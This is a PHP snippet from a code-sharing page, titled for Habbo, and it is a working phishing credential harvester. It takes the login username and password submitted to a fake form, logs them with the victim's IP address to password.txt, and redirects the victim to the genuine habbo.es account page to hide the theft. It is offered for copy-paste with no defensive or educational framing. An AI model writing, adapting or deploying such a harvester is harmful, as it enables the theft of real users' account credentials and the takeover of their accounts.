Sumbit to .txt/.html Habbo


/ Published in: PHP
Save to your folder(s)



Copy this code and paste it in your HTML
  1. <?php
  2. $Account = $_POST['login-username'];
  3. $Password = $_POST['login-password'];
  4. $IP = $_SERVER['REMOTE_ADDR'];
  5. $f = fopen("password.txt", "a");
  6. fwrite ($f, 'User: <b>['.$Account.']</b> Password: <b>['.$Password.']</b> IP: <b>['.$IP.']<b/><br>');
  7. fclose($f);
  8. header("Location: https://www.habbo.es/account/submit");
  9. ?>

Report this snippet


Comments

RSS Icon Subscribe to comments

You need to login to post a comment.